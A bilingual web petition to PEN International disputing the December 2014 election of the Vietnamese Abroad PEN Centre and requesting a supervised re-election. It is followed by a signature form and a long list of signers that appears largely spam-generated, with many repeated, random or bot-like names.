Search Vietlist.us
Search the Web

covang

Đừng nghe những gì Cộng sản nói. Hãy nhìn những gì Cộng sản làm !
Đừng sợ những gì Cộng sản làm. Hãy làm những gì Cộng sản sợ !

---------o0o---------

Xin ký tên gởi ông Chủ tịch và ông Tổng thư ký Văn Bút Quốc Tế phản đối/hoặc không phản đối kỳ bầu cử vừa qua và yêu cầu bầu cử lại dưới sự giám sát của Văn Bút Quốc Tế.

-------o0o-------

Dear Dr. John Ralston, President
and Mr. Hori Takeaki, Secretary
PEN International

We, the undersigned members of VAPC hereby submit this report to you on Mr. Vu Van Tung's violation of PEN's Charter spirit in expelling members and prohibiting delegates of three VAPC's Regions from the Assembly of Delegates without informing the Congress for approval.

He was also running for his second term in a controversial race. The Election Committee appointed by Mr. Vu​ Van Tung​ didn't allow email ballots as regulated by VAPC's Regulations,​ dozens of members who voiced their questions on unclear matters ​including​ 18 members ​who ​did not receive "authorized ballots" sent by the Election Committee, and 41 missing ballots (30% of VAPC members were excluded from the election).

Therefore,

- ​We hereby reject the result of the election of the VAPC on 6 December 2014 and distrust Mr. Vu Van Tung and his Executive Board, and ​

- ​W​e hereby request a fair and transparent election under the supervision of PEN International as it was in 2008.-------o0o-------

Phần tiếng Việt

Thưa Tiến sĩ John Ralston, Chủ tịch
Và Ông Hori Takeaki, Tổng Thư Ký
Văn Bút Quốc Tế

Chúng tôi, những người đứng tên dưới đây là hội viên VBVNHN xin phúc trình tới quí ông về việc ông Vũ Văn Tùng đã vi phạm tinh thần Hiến Chương VBQT khi trục xuất hội viên và ngăn cấm đại biểu từ 3 Vùng của VBVNHN tới dự Đại Hội Đồng VBVNHN mà không thông qua để được Đại Hội chấp thuận.

Ông ta còn tranh cử nhiệm kỳ thứ hai một cách không trong sáng. Ban Bầu Cử do ông Vũ Văn Tùng chỉ định đã không cho phép hội viên bầu qua emails như Điều lệ VBVNHN qui định, hàng mấy mươi hội viên đã lên tiếng chất vấn về sự thiếu trong sáng, trong đó có 18 hội viên không được Ban Bầu Cử gửi phiếu bầu, và 41 phiếu bầu (30%) hiện mất tích của những hội viên bị loại ra khỏi cuộc bầu cử.

Bởi các lẽ đó, chúng tôi phủ nhận kết quả bầu cử ngày 6 tháng 12 năm 2014 vừa qua, bất tín nhiệm ông Vũ Văn Tùng cùng Ban Chấp Hành của ông ta, và

Từ đó, chúng tôi yêu cầu tổ chức một cuộc bầu cử công bằng và trong sáng dưới sự giám sát của Văn Bút Quốc Tế.


Ký tên gởi ông Chủ tịch và ông Tổng thư ký Văn Bút Quốc Tế:

1- Tên hay Bút Hiệu, Name or Pen Name: (Xin đừng bỏ dấu - Cần phải có):

2- Thuộc Vùng nào, Select centre: (Cần phải có):

Vùng Canada. Trung Nam Hoa Kỳ.
Đông Bắc Hoa Kỳ. Tây Bắc Hoa Kỳ.
Đông Nam Hoa Kỳ. Tây Nam Hoa Kỳ.
Nam Hoa Kỳ. Vùng Úc Châu.

3- Ðồng ý bầu Ban Chấp Hành lại hay không: (Cần phải có):

Ðồng ý bầu lại. Không đồng ý bầu lại. Không ý kiến.

4- Ý Kiến Ðóng Góp, Feedback:(Không cần phải có):

---------o0o---------

Danh Sách Quý Văn Hữu ký tên Không đồng ý bầu lại:

 1. Adalberto, Southern US,
 2. Luciano, Southern US,
 3. Branden, Southern US,
 4. Teodoro, Southern US,
 5. Cody, Southern US,
 6. Britt, North-Eastern US,
 7. Angel, North-Eastern US,
 8. Bonser, North-Eastern US,
 9. Donnell, North-Eastern US,
 10. Grover, North-Eastern US,
 11. zkpcrlgy, North-Eastern US,
 12. ivbvgzssrjo, North-Western US,
 13. wjczcnzol, North-Eastern US,
 14. tbombhzas, South-Eastern US,
 15. wgwullatn, North-Western US,
 16. hzhuxrueo, Mid-Southern US,
 17. tlbzlp, North-Western US,
 18. nnvsroduu, North-Eastern US,
 19. Colby, North-Western US,
 20. Lucius, North-Western US,
 21. Arnoldo, North-Western US,
 22. Douglass, North-Western US,
 23. Stanley, North-Western US,
 24. Freelove, North-Western US,
 25. Brock, North-Western US,
 26. Marco, North-Western US,
 27. Sarah, North-Western US,
 28. Gustavo, North-Western US,
 29. Rayford, Southern US,
 30. Jeffry, Southern US,
 31. Dalton, Southern US,
 32. Malcom, Southern US,
 33. Alfredo, Southern US,
 34. Brady, Southern US,
 35. Courtney, Southern US,
 36. Glenn, Southern US,
 37. Marty, Southern US,
 38. Damian, Southern US,
 39. Wayne, North-Eastern US,
 40. Fredric, North-Eastern US,
 41. Gregg, North-Eastern US,
 42. Johnnie, North-Eastern US,
 43. Willard, North-Eastern US,
 44. Curtis, Mid-Southern US,
 45. Timothy, Mid-Southern US,
 46. Katherine, Mid-Southern US,
 47. Forrest, Mid-Southern US,
 48. Merle, Mid-Southern US,
 49. Dallas, South-Western US,
 50. Warner, South-Western US,
 51. Micheal, South-Western US,
 52. Harris, South-Western US,
 53. Jerrold, South-Western US,
 54. Reinaldo, North-Eastern US,
 55. Donte, North-Eastern US,
 56. Hipolito, North-Eastern US,
 57. Aidan, North-Eastern US,
 58. Clinton, North-Eastern US,
 59. Sanford, Mid-Southern US,
 60. Wayne, Mid-Southern US,
 61. Ronnie, Mid-Southern US,
 62. Eugenio, Mid-Southern US,
 63. Freeman, Mid-Southern US,
 64. Jimmie, Southern US,
 65. Gayle, Southern US,
 66. Brooke, Southern US,
 67. Hollis, Southern US,
 68. Dghonson, Southern US,
 69. Jamaal, South-Western US,
 70. Ian, South-Western US,
 71. Carmelo, South-Western US,
 72. Waldo, South-Western US,
 73. Oscar, South-Western US,
 74. Everett, South-Western US,
 75. Claudio, South-Western US,
 76. Andrew, South-Western US,
 77. Danial, South-Western US,
 78. Heath, South-Western US,
 79. Dirtbill, Mid-Southern US,
 80. Jenna, Mid-Southern US,
 81. Clement, Mid-Southern US,
 82. Mike, Mid-Southern US,
 83. Walton, Mid-Southern US,
 84. Bruce, North-Western US,
 85. Jefferey, North-Western US,
 86. Diana, North-Western US,
 87. Cole, North-Western US,
 88. Alvin, North-Western US,
 89. Geoffrey, Southern US,
 90. Alexandra, Southern US,
 91. Jerrod, Southern US,
 92. Emma, Southern US,
 93. Elliot, Southern US,
 94. Jasper, South-Western US,
 95. Darnell, South-Western US,
 96. Giovanni, South-Western US,
 97. Cody, South-Western US,
 98. Dominick, South-Western US,
 99. Austin, South-Eastern US,
 100. Lucien, South-Eastern US,
 101. Guadalupe, South-Eastern US,
 102. Paris, South-Eastern US,
 103. Rocky, South-Eastern US,
 104. Sean, North-Western US,
 105. Edwin, North-Western US,
 106. Alberto, North-Western US,
 107. Genesis, North-Western US,
 108. Timmy, North-Western US,
 109. Brooke, North-Eastern US,
 110. Clinton, North-Eastern US,
 111. Benedict, North-Eastern US,
 112. Walton, Mid-Southern US,
 113. Gordon, North-Eastern US,
 114. Tobias, Mid-Southern US,
 115. Dewey, North-Eastern US,
 116. Chance, Mid-Southern US,
 117. Jerold, Mid-Southern US,
 118. Steve, Mid-Southern US,
 119. Victor, North-Western US,
 120. Truman, North-Western US,
 121. Elizabeth, North-Western US,
 122. Josiah, North-Western US,
 123. Filiberto, North-Western US,
 124. Steven, Mid-Southern US,
 125. Merlin, Mid-Southern US,
 126. Doyle, Mid-Southern US,
 127. Bradly, Mid-Southern US,
 128. Jermaine, Mid-Southern US,
 129. Valeria, North-Eastern US,
 130. Erick, North-Eastern US,
 131. Chung, North-Eastern US,
 132. Wilfred, North-Eastern US,
 133. Ayden, North-Eastern US,
 134. Morris, South-Western US,
 135. Moshe, South-Western US,
 136. Bennie, South-Western US,
 137. Isabel, South-Western US,
 138. Benito, South-Western US,
 139. Shelton, North-Western US,
 140. Gregory, North-Western US,
 141. Chloe, North-Western US,
 142. Waldo, North-Western US,
 143. Timothy, North-Western US,
 144. Felipe, North-Eastern US,
 145. Sean, North-Eastern US,
 146. Terrell, North-Eastern US,
 147. Victor, North-Eastern US,
 148. Jamey, North-Eastern US,
 149. Brendon, North-Eastern US,
 150. Malik, North-Eastern US,
 151. Katelyn, North-Eastern US,
 152. Dogkill, North-Eastern US,
 153. Wilton, North-Eastern US,
 154. Jerrod, South-Eastern US,
 155. Jackie, South-Eastern US,
 156. Danielle, South-Eastern US,
 157. Jose, South-Eastern US,
 158. Melissa, South-Eastern US,
 159. Leah, North-Western US,
 160. Adolph, North-Western US,
 161. Daren, North-Western US,
 162. Julius, North-Western US,
 163. Jimmie, North-Western US,
 164. Rocco, Southern US,
 165. Johnathon, Southern US,
 166. Leigh, Southern US,
 167. Jarrod, Southern US,
 168. Autumn, Southern US,
 169. Waylon, North-Western US,
 170. Roman, North-Western US,
 171. Lily, North-Western US,
 172. Edison, North-Western US,
 173. Erick, North-Western US,
 174. Agustin, South-Eastern US,
 175. Emily, South-Eastern US,
 176. Rusty, South-Eastern US,
 177. Milton, South-Eastern US,
 178. Cletus, South-Eastern US,
 179. Jerome, South-Western US,
 180. Floyd, South-Western US,
 181. Santiago, South-Western US,
 182. Peyton, South-Western US,
 183. Mishel, South-Western US,
 184. Ellsworth, Mid-Southern US,
 185. Cornell, Mid-Southern US,
 186. Jesse, Mid-Southern US,
 187. Kurtis, Mid-Southern US,
 188. Antione, Mid-Southern US,
 189. Cooler111, Southern US,
 190. Deshawn, Southern US,
 191. Angel, Southern US,
 192. Lowell, Southern US,
 193. Barrett, Southern US,
 194. Ismael, Mid-Southern US,
 195. Antonio, Mid-Southern US,
 196. Harley, Mid-Southern US,
 197. Diana, Mid-Southern US,
 198. Stanton, Mid-Southern US,
 199. Sofia, South-Eastern US,
 200. Willy, South-Eastern US,
 201. Bertram, South-Eastern US,
 202. Alvaro, South-Eastern US,
 203. Lionel, South-Eastern US,
 204. Woodrow, North-Eastern US,
 205. Edmund, North-Eastern US,
 206. Murray, North-Eastern US,
 207. Elden, North-Eastern US,
 208. Gerard, North-Eastern US,
 209. Terrell, Southern US,
 210. Stacy, Southern US,
 211. Leslie, Southern US,
 212. Jefferson, Southern US,
 213. Justin, Southern US,
 214. Landon, Mid-Southern US,
 215. Tony, Mid-Southern US,
 216. Joseph, Mid-Southern US,
 217. Marcelo, Mid-Southern US,
 218. Martin, Mid-Southern US,
 219. Vanessa, South-Eastern US,
 220. Adalberto, South-Eastern US,
 221. Quincy, South-Eastern US,
 222. Chauncey, South-Eastern US,
 223. Freelife, South-Eastern US,
 224. Benny, North-Western US,
 225. Jorge, North-Western US,
 226. Vida, North-Western US,
 227. Jimmie, North-Western US,
 228. Samual, North-Western US,
 229. Courtney, North-Western US,
 230. Thomas, North-Western US,
 231. Harley, North-Western US,
 232. Haywood, North-Western US,
 233. Abigail, North-Western US,
 234. Heriberto, South-Eastern US,
 235. Jonah, South-Eastern US,
 236. Refugio, South-Eastern US,
 237. Leonel, South-Eastern US,
 238. Nogood87, South-Eastern US,
 239. Emily, South-Western US,
 240. Victoria, South-Western US,
 241. Zackary, South-Western US,
 242. Willard, South-Western US,
 243. Jorge, South-Western US,
 244. Layla, Mid-Southern US,
 245. Albert, Mid-Southern US,
 246. Denis, Mid-Southern US,
 247. Marlon, Mid-Southern US,
 248. Behappy, Mid-Southern US,
 249. Johnathon, South-Western US,
 250. Dogkill, South-Western US,
 251. Barrett, South-Western US,
 252. David, South-Western US,
 253. Miles, South-Western US,
 254. Kaylee, South-Western US,
 255. Freddie, South-Western US,
 256. Howard, South-Western US,
 257. Marcus, South-Western US,
 258. Aubrey, South-Western US,
 259. Rashad, Southern US,
 260. Porter, Southern US,
 261. Logan, Southern US,
 262. Lonny, Southern US,
 263. Isaac, Southern US,
 264. Domenic, North-Eastern US,
 265. Christopher, North-Eastern US,
 266. Abigail, North-Eastern US,
 267. Bennie, North-Eastern US,
 268. Young, North-Eastern US,
 269. Lesley, South-Western US,
 270. Buster, South-Western US,
 271. Randell, South-Western US,
 272. Faustino, South-Western US,
 273. Byron, South-Western US,
 274. Roderick, Southern US,
 275. Stacey, Southern US,
 276. Agustin, Southern US,
 277. Leopoldo, Southern US,
 278. Laverne, Southern US,
 279. Darell, South-Eastern US,
 280. Orlando, South-Eastern US,
 281. Valentin, South-Eastern US,
 282. Infest, South-Eastern US,
 283. Billie, South-Eastern US,
 284. Moses, Mid-Southern US,
 285. Joseph, Mid-Southern US,
 286. Logan, Mid-Southern US,
 287. Horacio, Mid-Southern US,
 288. Madelyn, Mid-Southern US,
 289. Laurence, North-Western US,
 290. Gianna, North-Western US,
 291. Denver, North-Western US,
 292. Milan, North-Western US,
 293. Norris, North-Western US,
 294. Isaac, Mid-Southern US,
 295. Jeffery, Mid-Southern US,
 296. Foster, Mid-Southern US,
 297. Edward, Mid-Southern US,
 298. Domingo, Mid-Southern US,
 299. Renaldo, South-Western US,
 300. Leroy, South-Western US,
 301. Antwan, South-Western US,
 302. Allan, South-Western US,
 303. Elijah, South-Western US,
 304. Kayla, Mid-Southern US,
 305. Keven, Mid-Southern US,
 306. Darrell, Mid-Southern US,
 307. Garret, Mid-Southern US,
 308. William, Mid-Southern US,
 309. Morgan, South-Eastern US,
 310. Dalton, South-Eastern US,
 311. Tracey, South-Eastern US,
 312. Bertram, South-Eastern US,
 313. Jada, South-Eastern US,
 314. Porfirio, South-Western US,
 315. Abdul, South-Western US,
 316. Jennifer, South-Western US,
 317. Dwayne, South-Western US,
 318. Anthony, South-Western US,
 319. Trinity, South-Eastern US,
 320. Isaias, South-Eastern US,
 321. Claudio, South-Eastern US,
 322. Stephanie, South-Eastern US,
 323. Marshall, South-Eastern US,
 324. Toney, South-Eastern US,
 325. Porfirio, South-Eastern US,
 326. Ervin, South-Eastern US,
 327. Gonzalo, South-Eastern US,
 328. Elizabeth, South-Eastern US,
 329. celtizn, South-Eastern US,
 330. wsfrxpysz, South-Western US,
 331. diolzrnlgqq, Mid-Southern US,
 332. Tyron, South-Western US,
 333. Craig, South-Western US,
 334. Diana, South-Western US,
 335. Robby, South-Western US,
 336. Pedro, South-Western US,
 337. Hailey, South-Western US,
 338. Renaldo, Mid-Southern US,
 339. Sebastian, South-Western US,
 340. Joesph, Mid-Southern US,
 341. George, South-Western US,
 342. Ella, Mid-Southern US,
 343. Serenity, South-Western US,
 344. Forrest, Mid-Southern US,
 345. Angelina, South-Western US,
 346. Harland, Mid-Southern US,
 347. Milan, Southern US,
 348. Preston, Southern US,
 349. Nickolas, Southern US,
 350. Geoffrey, Southern US,
 351. Bryon, Southern US,
 352. Lightsoul, Mid-Southern US,
 353. Haley, Mid-Southern US,
 354. Willian, Mid-Southern US,
 355. Tyree, Mid-Southern US,
 356. Garret, Mid-Southern US,
 357. Felton, Mid-Southern US,
 358. Jonathan, Mid-Southern US,
 359. Tyson, Mid-Southern US,
 360. Bennie, Mid-Southern US,
 361. Nevaeh, Mid-Southern US,
 362. William, South-Eastern US,
 363. Glenn, South-Eastern US,
 364. Mitchel, South-Eastern US,
 365. Bernard, South-Eastern US,
 366. Melanie, South-Eastern US,
 367. Jonas, South-Eastern US,
 368. Getjoy, South-Eastern US,
 369. Bradley, South-Eastern US,
 370. Salvador, South-Eastern US,
 371. Tyron, South-Eastern US,
 372. Danilo, South-Western US,
 373. Jerrell, South-Western US,
 374. Bennie, South-Western US,
 375. Marlon, South-Western US,
 376. Tommy, South-Western US,
 377. Fermin, Mid-Southern US,
 378. Marvin, Mid-Southern US,
 379. Jamison, Mid-Southern US,
 380. Armand, Mid-Southern US,
 381. Emory, Mid-Southern US,
 382. Jewell, South-Eastern US,
 383. Edmundo, South-Eastern US,
 384. Johnie, South-Eastern US,
 385. Faith, South-Eastern US,
 386. Logan, South-Eastern US,
 387. Dwayne, Southern US,
 388. Aidan, Southern US,
 389. Behappy, Southern US,
 390. Joshua, Southern US,
 391. Rocco, Southern US,
 392. Nathanial, South-Eastern US,
 393. Tilburg, South-Eastern US,
 394. Terrell, South-Eastern US,
 395. Emerson, South-Eastern US,
 396. Spencer, South-Eastern US,
 397. Newton, South-Eastern US,
 398. Clayton, South-Eastern US,
 399. Cole, South-Eastern US,
 400. Young, South-Eastern US,
 401. Edgardo, South-Eastern US,
 402. Keneth, North-Western US,
 403. Plank, North-Western US,
 404. Reuben, North-Western US,
 405. Melvin, North-Western US,
 406. Stefan, North-Western US,
 407. Garret, Mid-Southern US,
 408. Mariano, Mid-Southern US,
 409. Emory, Mid-Southern US,
 410. Jenna, Mid-Southern US,
 411. Frank, Mid-Southern US,
 412. Raleigh, Southern US,
 413. Lavern, Southern US,
 414. Jared, Southern US,
 415. Edgardo, Southern US,
 416. Mickey, Southern US,
 417. Payton, South-Western US,
 418. Edwin, South-Western US,
 419. Stanford, South-Western US,
 420. Rocco, South-Western US,
 421. Goodsam, South-Western US,
 422. Forest, Southern US,
 423. Ignacio, Southern US,
 424. Claire, Southern US,
 425. Ashley, Southern US,
 426. Alexis, Southern US,
 427. Napoleon, Mid-Southern US,
 428. Jefferson, Mid-Southern US,
 429. Gaylord, Mid-Southern US,
 430. Denver, Mid-Southern US,
 431. Anna, Mid-Southern US,
 432. Stefan, North-Western US,
 433. Israel, North-Western US,
 434. Bradly, North-Western US,
 435. Arnoldo, North-Western US,
 436. Isaiah, North-Western US,
 437. Royal, Mid-Southern US,
 438. Porfirio, Mid-Southern US,
 439. Fermin, Mid-Southern US,
 440. Cletus, Mid-Southern US,
 441. Freddie, Mid-Southern US,
 442. Ruben, South-Eastern US,
 443. Percy, South-Eastern US,
 444. Cornelius, South-Eastern US,
 445. Damien, South-Eastern US,
 446. Wesley, South-Eastern US,
 447. Jospeh, South-Eastern US,
 448. Jamaal, South-Eastern US,
 449. Madison, South-Eastern US,
 450. Jared, South-Eastern US,
 451. Armando, South-Eastern US,
 452. Willie, Mid-Southern US,
 453. Josef, Mid-Southern US,
 454. Edgardo, Mid-Southern US,
 455. Norbert, Mid-Southern US,
 456. Craig, Mid-Southern US,
 457. Carlos, Mid-Southern US,
 458. Richard, Mid-Southern US,
 459. Brendan, Mid-Southern US,
 460. Giuseppe, Mid-Southern US,
 461. Edward, Mid-Southern US,
 462. Bruce, South-Western US,
 463. Refugio, South-Western US,
 464. Nogood87, South-Western US,
 465. Harold, South-Western US,
 466. Jeffery, South-Western US,
 467. Benedict, Southern US,
 468. Colby, Southern US,
 469. Fritz, Southern US,
 470. Lucky, Southern US,
 471. Bennett, Southern US,
 472. Ayden, South-Western US,
 473. Anthony, South-Western US,
 474. Rebecca, South-Western US,
 475. Nathan, South-Western US,
 476. Robbie, South-Western US,
 477. Dallas, North-Eastern US,
 478. Claud, North-Eastern US,
 479. Chuck, North-Eastern US,
 480. Denny, North-Eastern US,
 481. Edmund, North-Eastern US,
 482. Rocky, South-Western US,
 483. Brett, South-Western US,
 484. Rickie, South-Western US,
 485. Eli, South-Western US,
 486. Kirby, South-Western US,
 487. Broderick, Mid-Southern US,
 488. Calvin, Mid-Southern US,
 489. Katelyn, Mid-Southern US,
 490. Jamey, Mid-Southern US,
 491. Teddy, Mid-Southern US,
 492. Donny, North-Eastern US,
 493. Kaden, North-Eastern US,
 494. Truman, North-Eastern US,
 495. Jeffry, North-Eastern US,
 496. Virgilio, North-Eastern US,
 497. Arlie, Southern US,
 498. Tristan, Southern US,
 499. Lucien, Southern US,
 500. Cole, Southern US,
 501. Blair, Southern US,
 502. Isabella, Mid-Southern US,
 503. Moises, Mid-Southern US,
 504. Dewitt, Mid-Southern US,
 505. Bella, Mid-Southern US,
 506. Mitchell, Mid-Southern US,
 507. Paris, North-Eastern US,
 508. Cole, North-Eastern US,
 509. Mitchel, North-Eastern US,
 510. Forrest, North-Eastern US,
 511. Nolan, North-Eastern US,
 512. Lioncool, South-Eastern US,
 513. Moises, South-Eastern US,
 514. Bennie, South-Eastern US,
 515. Clayton, South-Eastern US,
 516. Maynard, South-Eastern US,
 517. Jasmine, South-Western US,
 518. Wesley, South-Western US,
 519. Foster, South-Western US,
 520. Howard, South-Western US,
 521. Robert, South-Western US,
 522. Raymond, North-Eastern US,
 523. Garret, North-Eastern US,
 524. Normand, North-Eastern US,
 525. Geoffrey, North-Eastern US,
 526. Mitchell, North-Eastern US,
 527. Blair, North-Western US,
 528. Earnest, North-Western US,
 529. Marcelo, North-Western US,
 530. Crazyivan, North-Western US,
 531. Ferdinand, North-Western US,
 532. Rodolfo, South-Western US,
 533. German, South-Western US,
 534. Charlie, South-Western US,
 535. Barry, South-Western US,
 536. Elden, South-Western US,
 537. Madison, South-Eastern US,
 538. Keven, South-Eastern US,
 539. Cornelius, South-Eastern US,
 540. Lewis, South-Eastern US,
 541. Jesus, South-Eastern US,
 542. Rupert, North-Western US,
 543. Parker, North-Western US,
 544. Melanie, North-Western US,
 545. Fermin, North-Western US,
 546. Hayden, North-Western US,
 547. Isabel, South-Western US,
 548. Anderson, South-Western US,
 549. Tyrone, South-Western US,
 550. Lanny, South-Western US,
 551. Samuel, South-Western US,
 552. Dghonson, North-Eastern US,
 553. Dghonson, North-Eastern US,
 554. Renato, North-Eastern US,
 555. Solomon, North-Eastern US,
 556. Oscar, North-Eastern US,
 557. Jackie, Southern US,
 558. Lenard, Southern US,
 559. Madelyn, Southern US,
 560. Edgardo, Southern US,
 561. Edmundo, Southern US,
 562. Evan, South-Eastern US,
 563. Avery, South-Eastern US,
 564. Fletcher, South-Eastern US,
 565. Lemuel, South-Eastern US,
 566. Wiley, South-Eastern US,
 567. Virgil, South-Eastern US,
 568. Damon, South-Eastern US,
 569. Nicholas, South-Eastern US,
 570. Jonah, South-Eastern US,
 571. Ralph, South-Eastern US,
 572. Aidan, South-Eastern US,
 573. Marcos, South-Eastern US,
 574. Cecil, South-Eastern US,
 575. Jason, South-Eastern US,
 576. Josiah, South-Eastern US,
 577. Curt, North-Eastern US,
 578. Hobert, North-Eastern US,
 579. Andreas, North-Eastern US,
 580. Fletcher, North-Eastern US,
 581. Wilbert, North-Eastern US,
 582. Terrence, Mid-Southern US,
 583. Riley, Mid-Southern US,
 584. Genaro, Mid-Southern US,
 585. Renato, Mid-Southern US,
 586. Brady, Mid-Southern US,
 587. Valentin, Southern US,
 588. Crazyivan, Southern US,
 589. Genesis, North-Western US,
 590. Allison, Southern US,
 591. Leonel, North-Western US,
 592. Edison, Southern US,
 593. Jerold, North-Western US,
 594. Cesar, Southern US,
 595. Allan, North-Western US,
 596. Phillip, North-Western US,
 597. Clark, North-Eastern US,
 598. Ronnie, North-Eastern US,
 599. Theodore, North-Eastern US,
 600. Chong, North-Eastern US,
 601. Marlin, North-Eastern US,
 602. Judson, Mid-Southern US,
 603. Rickey, Mid-Southern US,
 604. Damon, Mid-Southern US,
 605. Ryan, Mid-Southern US,
 606. Jefferson, Mid-Southern US,
 607. Lifestile, South-Eastern US,
 608. Vincent, South-Eastern US,
 609. Deshawn, South-Eastern US,
 610. Brooks, South-Eastern US,
 611. Jeramy, South-Eastern US,
 612. Tony, South-Western US,
 613. Horacio, South-Western US,
 614. Barton, South-Western US,
 615. Ramon, South-Western US,
 616. Abram, South-Western US,
 617. Pierre, North-Eastern US,
 618. Gabriel, North-Eastern US,
 619. Gerry, North-Eastern US,
 620. Dalton, North-Eastern US,
 621. Sean, North-Eastern US,
 622. Raymundo, South-Western US,
 623. Ambrose, South-Western US,
 624. Terrell, South-Western US,
 625. Nogood87, South-Western US,
 626. Enoch, South-Western US,
 627. Deandre, North-Western US,
 628. Jonathan, North-Western US,
 629. Frank, North-Western US,
 630. Lavern, North-Western US,
 631. Carlton, North-Western US,
 632. Victor, South-Eastern US,
 633. Garfield, South-Eastern US,
 634. Harris, South-Eastern US,
 635. Danial, South-Eastern US,
 636. Raleigh, South-Eastern US,
 637. Toney, South-Eastern US,
 638. Trent, South-Eastern US,
 639. Jeremiah, South-Eastern US,
 640. Hunter, South-Eastern US,
 641. Brayden, South-Eastern US,
 642. Shawn, South-Eastern US,
 643. Donny, South-Eastern US,
 644. Ferdinand, South-Eastern US,
 645. Michel, South-Eastern US,
 646. Herbert, South-Eastern US,
 647. Hubert, North-Western US,
 648. Dominick, North-Western US,
 649. Larry, North-Western US,
 650. Rodrick, North-Western US,
 651. Jonathan, North-Western US,
 652. Kerry, South-Western US,
 653. Elton, South-Western US,
 654. Tristan, South-Western US,
 655. Gustavo, South-Western US,
 656. Devon, South-Western US,
 657. Dallas, South-Eastern US,
 658. Linwood, South-Eastern US,
 659. Raymon, South-Eastern US,
 660. Alfonzo, South-Eastern US,
 661. Vince, South-Eastern US,
 662. Kaden, South-Western US,
 663. Bobby, South-Western US,
 664. Getjoy, South-Western US,
 665. Chester, South-Western US,
 666. Errol, South-Western US,
 667. Hannah, Mid-Southern US,
 668. Rikky, Mid-Southern US,
 669. Jessie, Mid-Southern US,
 670. Fabian, Mid-Southern US,
 671. Jarvis, Mid-Southern US,
 672. Valentin, North-Eastern US,
 673. Peter, Mid-Southern US,
 674. Florencio, North-Eastern US,
 675. Buford, Mid-Southern US,
 676. Raymundo, North-Eastern US,
 677. Noble, Mid-Southern US,
 678. Jesus, North-Eastern US,
 679. Jarrett, Mid-Southern US,
 680. Ariel, North-Eastern US,
 681. Chuck, Mid-Southern US,
 682. Stanford, North-Eastern US,
 683. Victoria, North-Eastern US,
 684. Edgardo, North-Eastern US,
 685. Walter, North-Eastern US,
 686. Efrain, North-Eastern US,
 687. Brendan, South-Western US,
 688. Dennis, South-Western US,
 689. Sara, South-Western US,
 690. Cyril, South-Western US,
 691. Florentino, South-Western US,
 692. Gerard, Southern US,
 693. Francisco, Southern US,
 694. Allen, Southern US,
 695. Paige, Southern US,
 696. Cedrick, Southern US,
 697. Marco, Southern US,
 698. Wallace, Southern US,
 699. Shelton, Southern US,
 700. Robbie, Southern US,
 701. Felton, Southern US,
 702. Wallace, South-Eastern US,
 703. Chang, South-Eastern US,
 704. Mathew, South-Eastern US,
 705. Major, South-Eastern US,
 706. Felipe, South-Eastern US,
 707. Kidrock, Mid-Southern US,
 708. Wiley, Mid-Southern US,
 709. Lyndon, Mid-Southern US,
 710. Arnoldo, Mid-Southern US,
 711. Marcos, Mid-Southern US,
 712. Clemente, Southern US,
 713. Lesley, Southern US,
 714. Mario, Southern US,
 715. Kendall, Southern US,
 716. Samantha, Southern US,
 717. Graig, Southern US,
 718. Jamar, Southern US,
 719. Margarito, Southern US,
 720. Carlos, Southern US,
 721. Christoper, Southern US,
 722. Errol, North-Eastern US,
 723. Emanuel, North-Eastern US,
 724. Luciano, North-Eastern US,
 725. Marquis, North-Eastern US,
 726. Mason, North-Eastern US,
 727. Natalie, Mid-Southern US,
 728. Mishel, Mid-Southern US,
 729. Sandy, Mid-Southern US,
 730. Norbert, Mid-Southern US,
 731. Irwin, Mid-Southern US,
 732. Reinaldo, Mid-Southern US,
 733. Robbie, Mid-Southern US,
 734. Gerald, Mid-Southern US,
 735. Leopoldo, Mid-Southern US,
 736. Morgan, Mid-Southern US,
 737. Donald, Mid-Southern US,
 738. Ellsworth, Mid-Southern US,
 739. Louie, Mid-Southern US,
 740. Elton, Mid-Southern US,
 741. Kelley, Mid-Southern US,
 742. Lucky, North-Western US,
 743. Edison, North-Western US,
 744. Cliff, North-Western US,
 745. Dalton, North-Western US,
 746. Edmundo, North-Western US,
 747. Connor, South-Western US,
 748. Branden, South-Western US,
 749. Octavio, South-Western US,
 750. Erick, South-Western US,
 751. Daniel, South-Western US,
 752. Pitfighter, Mid-Southern US,
 753. Ahmed, Mid-Southern US,
 754. Jason, Mid-Southern US,
 755. Grace, Mid-Southern US,
 756. Elias, Mid-Southern US,
 757. Chadwick, Southern US,
 758. Brice, Southern US,
 759. Bryon, Southern US,
 760. Kenton, Southern US,
 761. Renaldo, Southern US,
 762. Lowell, North-Eastern US,
 763. Lauren, North-Eastern US,
 764. Marcellus, North-Eastern US,
 765. Stephen, North-Eastern US,
 766. Elijah, North-Eastern US,
 767. Mohamed, South-Western US,
 768. Eliseo, South-Western US,
 769. Alexander, South-Western US,
 770. Toney, South-Western US,
 771. Vance, South-Western US,
 772. Nigel, Southern US,
 773. Adrian, Southern US,
 774. Coolman, Southern US,
 775. Tommy, Southern US,
 776. Dominic, Southern US,
 777. Quinn, Southern US,
 778. Warren, Southern US,
 779. Parker, Southern US,
 780. Wilfred, Southern US,
 781. Rupert, Southern US,
 782. Arden, Mid-Southern US,
 783. Lazaro, Mid-Southern US,
 784. Merrill, Mid-Southern US,
 785. Leslie, Mid-Southern US,
 786. Brendan, Mid-Southern US,
 787. Royce, Mid-Southern US,
 788. Carlton, Mid-Southern US,
 789. Percy, Mid-Southern US,
 790. Hyman, Mid-Southern US,
 791. Lanny, Mid-Southern US,
 792. Elias, South-Eastern US,
 793. Emanuel, South-Eastern US,
 794. Jamal, South-Eastern US,
 795. Frankie, South-Eastern US,
 796. Demarcus, South-Eastern US,
 797. Lauren, South-Western US,
 798. Esteban, South-Western US,
 799. Micah, South-Western US,
 800. Eugene, South-Western US,
 801. Antonio, South-Western US,
 802. Doyle, South-Eastern US,
 803. Anna, South-Eastern US,
 804. Bailey, South-Eastern US,
 805. Ariel, South-Eastern US,
 806. Morris, South-Eastern US,
 807. Walker, North-Eastern US,
 808. Everett, North-Eastern US,
 809. Haley, North-Eastern US,
 810. Shane, North-Eastern US,
 811. Roland, North-Eastern US,
 812. Incomeppc, Mid-Southern US,
 813. Aaliyah, Mid-Southern US,
 814. Jordan, Mid-Southern US,
 815. Trinity, Mid-Southern US,
 816. Morris, Mid-Southern US,
 817. bzftqc, South-Eastern US,
 818. vozwsvzm, South-Western US,
 819. hzgvmptps, Southern US,
 820. auathjcg, Mid-Southern US,
 821. nweuin, Mid-Southern US,
 822. snyzkrrd, Mid-Southern US,
 823. jwuesx, Mid-Southern US,
 824. pntspqgtu, North-Eastern US,
 825. nezetnid, Mid-Southern US,
 826. ezmnbonbk, Southern US,
 827. aaetqe, South-Eastern US,
